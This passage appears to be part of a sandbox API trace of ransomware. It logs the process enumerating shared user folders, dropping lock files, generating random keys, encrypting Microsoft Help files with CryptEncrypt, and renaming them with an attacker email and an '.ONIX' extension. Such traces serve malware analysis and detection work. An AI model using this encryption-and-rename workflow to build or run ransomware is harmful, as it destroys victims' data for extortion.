ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328f8cf0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0122.035] FindNextFileW (in: hFindFile=0x48f030, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x328f8cf0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328f8cf0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328f8cf0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0122.035] CloseHandle (hObject=0x3cc) returned 1 [0122.035] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.035] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x19c)) [0122.035] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.035] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.036] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.036] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\All Users\\Application Data9c354ca09c354b444c.lock") returned 59 [0122.036] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Application Data9c354ca09c354b444c.lock" (normalized: "c:\\users\\all users\\application data9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.036] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.036] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.036] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b6e8 [0122.036] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Application Data\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x328f8cf0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328f8cf0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328f8cf0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0122.037] CloseHandle (hObject=0x3cc) returned 1 [0122.037] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.037] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x19c)) [0122.037] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.037] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.037] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.037] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\All Users\\Desktop9c354ca09c354b444c.lock") returned 50 [0122.037] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Desktop9c354ca09c354b444c.lock" (normalized: "c:\\users\\all users\\desktop9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.038] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.038] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.038] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0122.038] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Desktop\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x328f8cf0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328f8cf0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328f8cf0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0122.038] CloseHandle (hObject=0x3cc) returned 1 [0122.038] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.038] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x19c)) [0122.039] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.039] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.039] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.039] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\All Users\\Documents9c354ca09c354b444c.lock") returned 52 [0122.039] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Documents9c354ca09c354b444c.lock" (normalized: "c:\\users\\all users\\documents9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.039] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.039] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.040] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0122.040] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Documents\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x328f8cf0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328f8cf0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328f8cf0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0122.040] CloseHandle (hObject=0x3cc) returned 1 [0122.040] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.040] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x19c)) [0122.040] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.040] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.040] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.041] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\All Users\\Favorites9c354ca09c354b444c.lock") returned 52 [0122.041] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Favorites9c354ca09c354b444c.lock" (normalized: "c:\\users\\all users\\favorites9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.041] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.041] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.041] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454118 [0122.041] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Favorites\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x328f8cf0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x328f8cf0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328f8cf0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0122.041] CloseHandle (hObject=0x3cc) returned 1 [0122.042] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.042] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x19c)) [0122.042] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.042] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.042] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.042] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\All Users\\Microsoft Help9c354ca09c354b444c.lock") returned 57 [0122.042] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help9c354ca09c354b444c.lock" (normalized: "c:\\users\\all users\\microsoft help9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.042] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.043] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.043] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b6e8 [0122.043] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48f070 [0122.044] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.044] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x896b9210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x896b9210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe8b8c220, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hx.hxn", cAlternateFileName="")) returned 1 [0122.044] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.044] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.045] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x186, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.045] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.045] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.045] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.045] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.045] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn", dwFileAttributes=0x80) returned 1 [0122.045] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn") returned 41 [0122.045] GetProcessHeap () returned 0x410000 [0122.045] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc2) returned 0x44faf8 [0122.045] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn" [0122.045] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.045] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=390) returned 1 [0122.045] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x186 [0122.045] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.045] GetProcessHeap () returned 0x410000 [0122.045] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.045] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.047] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.050] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.051] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.052] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x186) returned 0x442938 [0122.052] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x186) returned 0x46a0f0 [0122.052] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.053] ReadFile (in: hFile=0x4d0, lpBuffer=0x442938, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x186, lpOverlapped=0x0) returned 1 [0122.053] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-390, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.053] WriteFile (in: hFile=0x4d0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x186, lpOverlapped=0x0) returned 1 [0122.054] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x186, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.054] CloseHandle (hObject=0x4d0) returned 1 [0122.054] GetProcessHeap () returned 0x410000 [0122.054] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.054] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.057] GetProcessHeap () returned 0x410000 [0122.057] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0122.057] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa72fc10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa72fc10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa7a2030, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.EXCEL.14.1033.hxn", cAlternateFileName="MSEXCE~1.HXN")) returned 1 [0122.057] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.058] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.058] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x146, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.058] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.058] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.058] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.058] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.058] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.059] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned 55 [0122.059] GetProcessHeap () returned 0x410000 [0122.059] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xde) returned 0x44faf8 [0122.059] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" [0122.059] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.059] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=326) returned 1 [0122.059] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x146 [0122.059] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.059] GetProcessHeap () returned 0x410000 [0122.059] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.059] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.059] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.062] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.064] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.065] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x146) returned 0x442938 [0122.065] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x146) returned 0x46a0f0 [0122.065] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.065] ReadFile (in: hFile=0x4d0, lpBuffer=0x442938, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x146, lpOverlapped=0x0) returned 1 [0122.065] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-326, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.065] WriteFile (in: hFile=0x4d0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x146, lpOverlapped=0x0) returned 1 [0122.066] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x146, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.066] CloseHandle (hObject=0x4d0) returned 1 [0122.066] GetProcessHeap () returned 0x410000 [0122.066] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.067] MoveFileExW 